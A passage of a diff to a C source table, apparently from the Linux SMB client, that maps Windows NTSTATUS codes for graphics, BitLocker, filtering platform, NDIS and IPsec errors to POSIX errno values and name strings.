+-	{STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT, -EIO,
+-	"STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT"},
+-	{STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM"},
+-	{STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN"},
+-	{STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT"},
+-	{STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED, -EIO,
+-	"STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED"},
+-	{STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION, -EIO,
+-	"STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION"},
+-	{STATUS_GRAPHICS_INVALID_CLIENT_TYPE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_CLIENT_TYPE"},
+-	{STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET, -EIO,
+-	"STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET"},
+-	{STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED, -EIO,
+-	"STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED"},
+-	{STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER, -EIO,
+-	"STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER"},
+-	{STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED, -EIO,
+-	"STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED"},
+-	{STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED, -EIO,
+-	"STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED"},
+-	{STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY, -EIO,
+-	"STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY"},
+-	{STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED, -EIO,
+-	"STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED"},
+-	{STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON, -EIO,
+-	"STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON"},
+-	{STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE, -EIO,
+-	"STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE"},
+-	{STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER, -EIO,
+-	"STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER"},
+-	{STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED, -EIO,
+-	"STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED"},
+-	{STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS,
+-	-EIO,
+-	"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS"},
+-	{STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST, -EIO,
+-	"STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST"},
+-	{STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR, -EIO,
+-	"STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR"},
+-	{STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS, -EIO,
+-	"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS"},
+-	{STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST, -EIO,
+-	"STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST"},
+-	{STATUS_GRAPHICS_OPM_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_OPM_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_COPP_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_COPP_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_UAB_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_UAB_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS, -EIO,
+-	"STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS"},
+-	{STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL, -EIO,
+-	"STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL"},
+-	{STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST, -EIO,
+-	"STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST"},
+-	{STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME, -EIO,
+-	"STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME"},
+-	{STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP, -EIO,
+-	"STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP"},
+-	{STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_OPM_INVALID_POINTER, -EIO,
+-	"STATUS_GRAPHICS_OPM_INVALID_POINTER"},
+-	{STATUS_GRAPHICS_OPM_INTERNAL_ERROR, -EIO,
+-	"STATUS_GRAPHICS_OPM_INTERNAL_ERROR"},
+-	{STATUS_GRAPHICS_OPM_INVALID_HANDLE, -EIO,
+-	"STATUS_GRAPHICS_OPM_INVALID_HANDLE"},
+-	{STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE, -EIO,
+-	"STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE"},
+-	{STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH, -EIO,
+-	"STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH"},
+-	{STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED, -EIO,
+-	"STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED"},
+-	{STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED, -EIO,
+-	"STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED"},
+-	{STATUS_GRAPHICS_PVP_HFS_FAILED, -EIO,
+-	"STATUS_GRAPHICS_PVP_HFS_FAILED"},
+-	{STATUS_GRAPHICS_OPM_INVALID_SRM, -EIO,
+-	"STATUS_GRAPHICS_OPM_INVALID_SRM"},
+-	{STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP, -EIO,
+-	"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP"},
+-	{STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP, -EIO,
+-	"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP"},
+-	{STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA, -EIO,
+-	"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA"},
+-	{STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET, -EIO,
+-	"STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET"},
+-	{STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH, -EIO,
+-	"STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH"},
+-	{STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE, -EIO,
+-	"STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE"},
+-	{STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS, -EIO,
+-	"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS"},
+-	{STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS, -EIO,
+-	"STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS"},
+-	{STATUS_GRAPHICS_I2C_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_I2C_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST, -EIO,
+-	"STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST"},
+-	{STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA, -EIO,
+-	"STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA"},
+-	{STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA, -EIO,
+-	"STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA"},
+-	{STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_DDCCI_INVALID_DATA, -EIO,
+-	"STATUS_GRAPHICS_DDCCI_INVALID_DATA"},
+-	{STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE,
+-	-EIO,
+-	"STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE"},
+-	{STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING, -EIO,
+-	"STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING"},
+-	{STATUS_GRAPHICS_MCA_INTERNAL_ERROR, -EIO,
+-	"STATUS_GRAPHICS_MCA_INTERNAL_ERROR"},
+-	{STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND, -EIO,
+-	"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND"},
+-	{STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH, -EIO,
+-	"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH"},
+-	{STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM, -EIO,
+-	"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM"},
+-	{STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE"},
+-	{STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS, -EIO,
+-	"STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS"},
+-	{STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED"},
+-	{STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME, -EIO,
+-	"STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME"},
+-	{STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP, -EIO,
+-	"STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP"},
+-	{STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_INVALID_POINTER, -EIO,
+-	"STATUS_GRAPHICS_INVALID_POINTER"},
+-	{STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE, -EIO,
+-	"STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE"},
+-	{STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL, -EIO,
+-	"STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL"},
+-	{STATUS_GRAPHICS_INTERNAL_ERROR, -EIO,
+-	"STATUS_GRAPHICS_INTERNAL_ERROR"},
+-	{STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS, -EIO,
+-	"STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS"},
+-	{STATUS_FVE_LOCKED_VOLUME, -EIO, "STATUS_FVE_LOCKED_VOLUME"},
+-	{STATUS_FVE_NOT_ENCRYPTED, -EIO, "STATUS_FVE_NOT_ENCRYPTED"},
+-	{STATUS_FVE_BAD_INFORMATION, -EIO, "STATUS_FVE_BAD_INFORMATION"},
+-	{STATUS_FVE_TOO_SMALL, -EIO, "STATUS_FVE_TOO_SMALL"},
+-	{STATUS_FVE_FAILED_WRONG_FS, -EIO, "STATUS_FVE_FAILED_WRONG_FS"},
+-	{STATUS_FVE_FAILED_BAD_FS, -EIO, "STATUS_FVE_FAILED_BAD_FS"},
+-	{STATUS_FVE_FS_NOT_EXTENDED, -EIO, "STATUS_FVE_FS_NOT_EXTENDED"},
+-	{STATUS_FVE_FS_MOUNTED, -EIO, "STATUS_FVE_FS_MOUNTED"},
+-	{STATUS_FVE_NO_LICENSE, -EIO, "STATUS_FVE_NO_LICENSE"},
+-	{STATUS_FVE_ACTION_NOT_ALLOWED, -EIO, "STATUS_FVE_ACTION_NOT_ALLOWED"},
+-	{STATUS_FVE_BAD_DATA, -EIO, "STATUS_FVE_BAD_DATA"},
+-	{STATUS_FVE_VOLUME_NOT_BOUND, -EIO, "STATUS_FVE_VOLUME_NOT_BOUND"},
+-	{STATUS_FVE_NOT_DATA_VOLUME, -EIO, "STATUS_FVE_NOT_DATA_VOLUME"},
+-	{STATUS_FVE_CONV_READ_ERROR, -EIO, "STATUS_FVE_CONV_READ_ERROR"},
+-	{STATUS_FVE_CONV_WRITE_ERROR, -EIO, "STATUS_FVE_CONV_WRITE_ERROR"},
+-	{STATUS_FVE_OVERLAPPED_UPDATE, -EIO, "STATUS_FVE_OVERLAPPED_UPDATE"},
+-	{STATUS_FVE_FAILED_SECTOR_SIZE, -EIO, "STATUS_FVE_FAILED_SECTOR_SIZE"},
+-	{STATUS_FVE_FAILED_AUTHENTICATION, -EIO,
+-	"STATUS_FVE_FAILED_AUTHENTICATION"},
+-	{STATUS_FVE_NOT_OS_VOLUME, -EIO, "STATUS_FVE_NOT_OS_VOLUME"},
+-	{STATUS_FVE_KEYFILE_NOT_FOUND, -EIO, "STATUS_FVE_KEYFILE_NOT_FOUND"},
+-	{STATUS_FVE_KEYFILE_INVALID, -EIO, "STATUS_FVE_KEYFILE_INVALID"},
+-	{STATUS_FVE_KEYFILE_NO_VMK, -EIO, "STATUS_FVE_KEYFILE_NO_VMK"},
+-	{STATUS_FVE_TPM_DISABLED, -EIO, "STATUS_FVE_TPM_DISABLED"},
+-	{STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO, -EIO,
+-	"STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO"},
+-	{STATUS_FVE_TPM_INVALID_PCR, -EIO, "STATUS_FVE_TPM_INVALID_PCR"},
+-	{STATUS_FVE_TPM_NO_VMK, -EIO, "STATUS_FVE_TPM_NO_VMK"},
+-	{STATUS_FVE_PIN_INVALID, -EIO, "STATUS_FVE_PIN_INVALID"},
+-	{STATUS_FVE_AUTH_INVALID_APPLICATION, -EIO,
+-	"STATUS_FVE_AUTH_INVALID_APPLICATION"},
+-	{STATUS_FVE_AUTH_INVALID_CONFIG, -EIO,
+-	"STATUS_FVE_AUTH_INVALID_CONFIG"},
+-	{STATUS_FVE_DEBUGGER_ENABLED, -EIO, "STATUS_FVE_DEBUGGER_ENABLED"},
+-	{STATUS_FVE_DRY_RUN_FAILED, -EIO, "STATUS_FVE_DRY_RUN_FAILED"},
+-	{STATUS_FVE_BAD_METADATA_POINTER, -EIO,
+-	"STATUS_FVE_BAD_METADATA_POINTER"},
+-	{STATUS_FVE_OLD_METADATA_COPY, -EIO, "STATUS_FVE_OLD_METADATA_COPY"},
+-	{STATUS_FVE_REBOOT_REQUIRED, -EIO, "STATUS_FVE_REBOOT_REQUIRED"},
+-	{STATUS_FVE_RAW_ACCESS, -EIO, "STATUS_FVE_RAW_ACCESS"},
+-	{STATUS_FVE_RAW_BLOCKED, -EIO, "STATUS_FVE_RAW_BLOCKED"},
+-	{STATUS_FWP_CALLOUT_NOT_FOUND, -EIO, "STATUS_FWP_CALLOUT_NOT_FOUND"},
+-	{STATUS_FWP_CONDITION_NOT_FOUND, -EIO,
+-	"STATUS_FWP_CONDITION_NOT_FOUND"},
+-	{STATUS_FWP_FILTER_NOT_FOUND, -EIO, "STATUS_FWP_FILTER_NOT_FOUND"},
+-	{STATUS_FWP_LAYER_NOT_FOUND, -EIO, "STATUS_FWP_LAYER_NOT_FOUND"},
+-	{STATUS_FWP_PROVIDER_NOT_FOUND, -EIO, "STATUS_FWP_PROVIDER_NOT_FOUND"},
+-	{STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND, -EIO,
+-	"STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND"},
+-	{STATUS_FWP_SUBLAYER_NOT_FOUND, -EIO, "STATUS_FWP_SUBLAYER_NOT_FOUND"},
+-	{STATUS_FWP_NOT_FOUND, -EIO, "STATUS_FWP_NOT_FOUND"},
+-	{STATUS_FWP_ALREADY_EXISTS, -EIO, "STATUS_FWP_ALREADY_EXISTS"},
+-	{STATUS_FWP_IN_USE, -EIO, "STATUS_FWP_IN_USE"},
+-	{STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS, -EIO,
+-	"STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS"},
+-	{STATUS_FWP_WRONG_SESSION, -EIO, "STATUS_FWP_WRONG_SESSION"},
+-	{STATUS_FWP_NO_TXN_IN_PROGRESS, -EIO, "STATUS_FWP_NO_TXN_IN_PROGRESS"},
+-	{STATUS_FWP_TXN_IN_PROGRESS, -EIO, "STATUS_FWP_TXN_IN_PROGRESS"},
+-	{STATUS_FWP_TXN_ABORTED, -EIO, "STATUS_FWP_TXN_ABORTED"},
+-	{STATUS_FWP_SESSION_ABORTED, -EIO, "STATUS_FWP_SESSION_ABORTED"},
+-	{STATUS_FWP_INCOMPATIBLE_TXN, -EIO, "STATUS_FWP_INCOMPATIBLE_TXN"},
+-	{STATUS_FWP_TIMEOUT, -ETIMEDOUT, "STATUS_FWP_TIMEOUT"},
+-	{STATUS_FWP_NET_EVENTS_DISABLED, -EIO,
+-	"STATUS_FWP_NET_EVENTS_DISABLED"},
+-	{STATUS_FWP_INCOMPATIBLE_LAYER, -EIO, "STATUS_FWP_INCOMPATIBLE_LAYER"},
+-	{STATUS_FWP_KM_CLIENTS_ONLY, -EIO, "STATUS_FWP_KM_CLIENTS_ONLY"},
+-	{STATUS_FWP_LIFETIME_MISMATCH, -EIO, "STATUS_FWP_LIFETIME_MISMATCH"},
+-	{STATUS_FWP_BUILTIN_OBJECT, -EIO, "STATUS_FWP_BUILTIN_OBJECT"},
+-	{STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS, -EIO,
+-	"STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS"},
+-	{STATUS_FWP_TOO_MANY_CALLOUTS, -EIO, "STATUS_FWP_TOO_MANY_CALLOUTS"},
+-	{STATUS_FWP_NOTIFICATION_DROPPED, -EIO,
+-	"STATUS_FWP_NOTIFICATION_DROPPED"},
+-	{STATUS_FWP_TRAFFIC_MISMATCH, -EIO, "STATUS_FWP_TRAFFIC_MISMATCH"},
+-	{STATUS_FWP_INCOMPATIBLE_SA_STATE, -EIO,
+-	"STATUS_FWP_INCOMPATIBLE_SA_STATE"},
+-	{STATUS_FWP_NULL_POINTER, -EIO, "STATUS_FWP_NULL_POINTER"},
+-	{STATUS_FWP_INVALID_ENUMERATOR, -EIO, "STATUS_FWP_INVALID_ENUMERATOR"},
+-	{STATUS_FWP_INVALID_FLAGS, -EIO, "STATUS_FWP_INVALID_FLAGS"},
+-	{STATUS_FWP_INVALID_NET_MASK, -EIO, "STATUS_FWP_INVALID_NET_MASK"},
+-	{STATUS_FWP_INVALID_RANGE, -EIO, "STATUS_FWP_INVALID_RANGE"},
+-	{STATUS_FWP_INVALID_INTERVAL, -EIO, "STATUS_FWP_INVALID_INTERVAL"},
+-	{STATUS_FWP_ZERO_LENGTH_ARRAY, -EIO, "STATUS_FWP_ZERO_LENGTH_ARRAY"},
+-	{STATUS_FWP_NULL_DISPLAY_NAME, -EIO, "STATUS_FWP_NULL_DISPLAY_NAME"},
+-	{STATUS_FWP_INVALID_ACTION_TYPE, -EIO,
+-	"STATUS_FWP_INVALID_ACTION_TYPE"},
+-	{STATUS_FWP_INVALID_WEIGHT, -EIO, "STATUS_FWP_INVALID_WEIGHT"},
+-	{STATUS_FWP_MATCH_TYPE_MISMATCH, -EIO,
+-	"STATUS_FWP_MATCH_TYPE_MISMATCH"},
+-	{STATUS_FWP_TYPE_MISMATCH, -EIO, "STATUS_FWP_TYPE_MISMATCH"},
+-	{STATUS_FWP_OUT_OF_BOUNDS, -EIO, "STATUS_FWP_OUT_OF_BOUNDS"},
+-	{STATUS_FWP_RESERVED, -EIO, "STATUS_FWP_RESERVED"},
+-	{STATUS_FWP_DUPLICATE_CONDITION, -EIO,
+-	"STATUS_FWP_DUPLICATE_CONDITION"},
+-	{STATUS_FWP_DUPLICATE_KEYMOD, -EIO, "STATUS_FWP_DUPLICATE_KEYMOD"},
+-	{STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER, -EIO,
+-	"STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER"},
+-	{STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER, -EIO,
+-	"STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER"},
+-	{STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER, -EIO,
+-	"STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER"},
+-	{STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT, -EIO,
+-	"STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT"},
+-	{STATUS_FWP_INCOMPATIBLE_AUTH_METHOD, -EIO,
+-	"STATUS_FWP_INCOMPATIBLE_AUTH_METHOD"},
+-	{STATUS_FWP_INCOMPATIBLE_DH_GROUP, -EIO,
+-	"STATUS_FWP_INCOMPATIBLE_DH_GROUP"},
+-	{STATUS_FWP_EM_NOT_SUPPORTED, -EOPNOTSUPP,
+-	"STATUS_FWP_EM_NOT_SUPPORTED"},
+-	{STATUS_FWP_NEVER_MATCH, -EIO, "STATUS_FWP_NEVER_MATCH"},
+-	{STATUS_FWP_PROVIDER_CONTEXT_MISMATCH, -EIO,
+-	"STATUS_FWP_PROVIDER_CONTEXT_MISMATCH"},
+-	{STATUS_FWP_INVALID_PARAMETER, -EIO, "STATUS_FWP_INVALID_PARAMETER"},
+-	{STATUS_FWP_TOO_MANY_SUBLAYERS, -EIO, "STATUS_FWP_TOO_MANY_SUBLAYERS"},
+-	{STATUS_FWP_CALLOUT_NOTIFICATION_FAILED, -EIO,
+-	"STATUS_FWP_CALLOUT_NOTIFICATION_FAILED"},
+-	{STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG, -EIO,
+-	"STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG"},
+-	{STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG, -EIO,
+-	"STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG"},
+-	{STATUS_FWP_TCPIP_NOT_READY, -EIO, "STATUS_FWP_TCPIP_NOT_READY"},
+-	{STATUS_FWP_INJECT_HANDLE_CLOSING, -EIO,
+-	"STATUS_FWP_INJECT_HANDLE_CLOSING"},
+-	{STATUS_FWP_INJECT_HANDLE_STALE, -EIO,
+-	"STATUS_FWP_INJECT_HANDLE_STALE"},
+-	{STATUS_FWP_CANNOT_PEND, -EIO, "STATUS_FWP_CANNOT_PEND"},
+-	{STATUS_NDIS_CLOSING, -EIO, "STATUS_NDIS_CLOSING"},
+-	{STATUS_NDIS_BAD_VERSION, -EIO, "STATUS_NDIS_BAD_VERSION"},
+-	{STATUS_NDIS_BAD_CHARACTERISTICS, -EIO,
+-	"STATUS_NDIS_BAD_CHARACTERISTICS"},
+-	{STATUS_NDIS_ADAPTER_NOT_FOUND, -EIO, "STATUS_NDIS_ADAPTER_NOT_FOUND"},
+-	{STATUS_NDIS_OPEN_FAILED, -EIO, "STATUS_NDIS_OPEN_FAILED"},
+-	{STATUS_NDIS_DEVICE_FAILED, -EIO, "STATUS_NDIS_DEVICE_FAILED"},
+-	{STATUS_NDIS_MULTICAST_FULL, -EIO, "STATUS_NDIS_MULTICAST_FULL"},
+-	{STATUS_NDIS_MULTICAST_EXISTS, -EIO, "STATUS_NDIS_MULTICAST_EXISTS"},
+-	{STATUS_NDIS_MULTICAST_NOT_FOUND, -EIO,
+-	"STATUS_NDIS_MULTICAST_NOT_FOUND"},
+-	{STATUS_NDIS_REQUEST_ABORTED, -EIO, "STATUS_NDIS_REQUEST_ABORTED"},
+-	{STATUS_NDIS_RESET_IN_PROGRESS, -EIO, "STATUS_NDIS_RESET_IN_PROGRESS"},
+-	{STATUS_NDIS_INVALID_PACKET, -EIO, "STATUS_NDIS_INVALID_PACKET"},
+-	{STATUS_NDIS_INVALID_DEVICE_REQUEST, -EIO,
+-	"STATUS_NDIS_INVALID_DEVICE_REQUEST"},
+-	{STATUS_NDIS_ADAPTER_NOT_READY, -EIO, "STATUS_NDIS_ADAPTER_NOT_READY"},
+-	{STATUS_NDIS_INVALID_LENGTH, -EIO, "STATUS_NDIS_INVALID_LENGTH"},
+-	{STATUS_NDIS_INVALID_DATA, -EIO, "STATUS_NDIS_INVALID_DATA"},
+-	{STATUS_NDIS_BUFFER_TOO_SHORT, -ENOBUFS,
+-	"STATUS_NDIS_BUFFER_TOO_SHORT"},
+-	{STATUS_NDIS_INVALID_OID, -EIO, "STATUS_NDIS_INVALID_OID"},
+-	{STATUS_NDIS_ADAPTER_REMOVED, -EIO, "STATUS_NDIS_ADAPTER_REMOVED"},
+-	{STATUS_NDIS_UNSUPPORTED_MEDIA, -EIO, "STATUS_NDIS_UNSUPPORTED_MEDIA"},
+-	{STATUS_NDIS_GROUP_ADDRESS_IN_USE, -EIO,
+-	"STATUS_NDIS_GROUP_ADDRESS_IN_USE"},
+-	{STATUS_NDIS_FILE_NOT_FOUND, -EIO, "STATUS_NDIS_FILE_NOT_FOUND"},
+-	{STATUS_NDIS_ERROR_READING_FILE, -EIO,
+-	"STATUS_NDIS_ERROR_READING_FILE"},
+-	{STATUS_NDIS_ALREADY_MAPPED, -EIO, "STATUS_NDIS_ALREADY_MAPPED"},
+-	{STATUS_NDIS_RESOURCE_CONFLICT, -EIO, "STATUS_NDIS_RESOURCE_CONFLICT"},
+-	{STATUS_NDIS_MEDIA_DISCONNECTED, -EIO,
+-	"STATUS_NDIS_MEDIA_DISCONNECTED"},
+-	{STATUS_NDIS_INVALID_ADDRESS, -EIO, "STATUS_NDIS_INVALID_ADDRESS"},
+-	{STATUS_NDIS_PAUSED, -EIO, "STATUS_NDIS_PAUSED"},
+-	{STATUS_NDIS_INTERFACE_NOT_FOUND, -EIO,
+-	"STATUS_NDIS_INTERFACE_NOT_FOUND"},
+-	{STATUS_NDIS_UNSUPPORTED_REVISION, -EIO,
+-	"STATUS_NDIS_UNSUPPORTED_REVISION"},
+-	{STATUS_NDIS_INVALID_PORT, -EIO, "STATUS_NDIS_INVALID_PORT"},
+-	{STATUS_NDIS_INVALID_PORT_STATE, -EIO,
+-	"STATUS_NDIS_INVALID_PORT_STATE"},
+-	{STATUS_NDIS_LOW_POWER_STATE, -EIO, "STATUS_NDIS_LOW_POWER_STATE"},
+-	{STATUS_NDIS_NOT_SUPPORTED, -ENOSYS, "STATUS_NDIS_NOT_SUPPORTED"},
+-	{STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED, -EIO,
+-	"STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED"},
+-	{STATUS_NDIS_DOT11_MEDIA_IN_USE, -EIO,
+-	"STATUS_NDIS_DOT11_MEDIA_IN_USE"},
+-	{STATUS_NDIS_DOT11_POWER_STATE_INVALID, -EIO,
+-	"STATUS_NDIS_DOT11_POWER_STATE_INVALID"},
+-	{STATUS_IPSEC_BAD_SPI, -EIO, "STATUS_IPSEC_BAD_SPI"},
+-	{STATUS_IPSEC_SA_LIFETIME_EXPIRED, -EIO,
+-	"STATUS_IPSEC_SA_LIFETIME_EXPIRED"},
+-	{STATUS_IPSEC_WRONG_SA, -EIO, "STATUS_IPSEC_WRONG_SA"},
+-	{STATUS_IPSEC_REPLAY_CHECK_FAILED, -EIO,
